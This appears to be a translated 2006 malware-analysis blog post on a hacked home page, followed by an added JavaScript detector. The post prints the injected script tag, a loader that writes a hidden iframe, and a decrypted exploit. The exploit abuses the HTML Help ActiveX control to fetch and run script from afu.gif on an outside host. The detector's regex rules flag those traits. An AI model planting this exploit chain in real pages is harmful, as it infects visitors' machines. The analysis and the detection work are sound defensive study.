Original by endurer
2006-03-16, 2nd edition, added: Kaspersky's reaction to afu.gif.
2006-03-14, 1st edition
The following code was inserted into the home page:
<script language="javascript" src="http://www.***3core.com/images/gif.js">
The code of http://www.***3core.com/images/gif.js is:
document.write("<iframe src=http://www.***3core.com/images/error.htm width=0 height=0></iframe>");
The content of http://www.***3core.com/images/error.htm (reported by Kaspersky as Trojan-Downloader.JS.Agent.e) is an encrypted script; decrypted, it reads:
<!--
var Words ="<script>document.write(unescape('<HTML>
<head>
</head>
<BODY>
<div style="display:none">
<OBJECT id="f1"
type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;file://c:\WINDOWS\Help\apps.chm'>
</OBJECT>
<OBJECT id="f2" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;javascript:eval("document.write(\"<SCRIPT language%20%3D%20JScript src=\\\"http://www.***3core.com/images/afu.gif\""+String.fromCharCode(62)+"</SCR\"+\"IPT\"+String.fromCharCode(62))")'>
</OBJECT>
</div>
<script>
f1.Click();setTimeout("f2.Click();",0);
</script>
</BODY>
</HTML>'));</script>"
function OutWord()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
OutWord();
// -->
The content of this error.htm is similar to the afu.htm in
and likewise downloads a file named afu.gif.
Kaspersky reports afu.gif as Exploit.VBS.Phel.bq.
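
The traits described in this post (a zero-size iframe, the HTML Help ActiveX classid, an Item parameter beginning with "command;", and a script loaded from a .gif URL) can be checked statically, including after peeling unescape() layers. The following is an added example, not code from the original post; the rule ids, function names and sample strings are constructed, and example.invalid is a placeholder host.

```javascript
// Added example: static triage for the traits this post describes.
// Sample markup is constructed; example.invalid is a placeholder host.
const HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"; // classid from error.htm

// Decode one layer of unescape()-style %XX / %uXXXX encoding.
function unescapeOnce(text) {
  return text.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Peel nested layers until the text stops changing (bounded number of rounds).
function peelLayers(text, maxRounds = 5) {
  let current = text;
  for (let i = 0; i < maxRounds; i++) {
    const next = unescapeOnce(current);
    if (next === current) break;
    current = next;
  }
  return current;
}

const RULES = [
  // iframe with both width=0 and height=0, as written by gif.js
  { id: "hidden-iframe",
    re: /<iframe\b(?=[^>]*\bwidth\s*=\s*["']?0\b)(?=[^>]*\bheight\s*=\s*["']?0\b)[^>]*>/i },
  // HTML Help ActiveX control instantiated from a web page
  { id: "hhctrl-object",
    re: new RegExp("classid\\s*=\\s*[\"']?clsid:" + HHCTRL_CLSID, "i") },
  // Item parameter whose value starts with "command;"
  { id: "hhctrl-command-item",
    re: /<param\b[^>]*\bname\s*=\s*["']?Item\d+["']?[^>]*\bvalue\s*=\s*["']?command;/i },
  // script source that carries an image file extension (afu.gif on this page)
  { id: "script-src-image-ext",
    re: /<script\b[^>]*\bsrc\s*=\s*\\*["']?[^"'\s>]+\.(gif|jpe?g|png|bmp)(?=[\\"'\s>?#]|$)/i },
];

// Return the ids of all rules that match the raw or the decoded text.
function scanPage(html) {
  const decoded = peelLayers(html);
  return RULES.filter(r => r.re.test(html) || r.re.test(decoded)).map(r => r.id);
}

// Constructed samples: loader script, percent-encoded object markup, benign page.
const SAMPLE_LOADER = 'document.write("<iframe src=http://example.invalid/e.htm width=0 height=0></iframe>");';
const SAMPLE_ENCODED = "document.write(unescape('%3COBJECT%20classid%3D%22clsid%3A" + HHCTRL_CLSID +
  "%22%3E%3CPARAM%20name%3D%22Item1%22%20value%3D%27command%3Bplaceholder%27%3E%3C%2FOBJECT%3E'))";
const SAMPLE_CLEAN = '<iframe src="/map.html" width="600" height="400"></iframe><script src="/js/app.js"></script>';

for (const s of [SAMPLE_LOADER, SAMPLE_ENCODED, SAMPLE_CLEAN]) console.log(scanPage(s));
```

Matches are triage signals for manual review of the page and the resources it references, not a verdict.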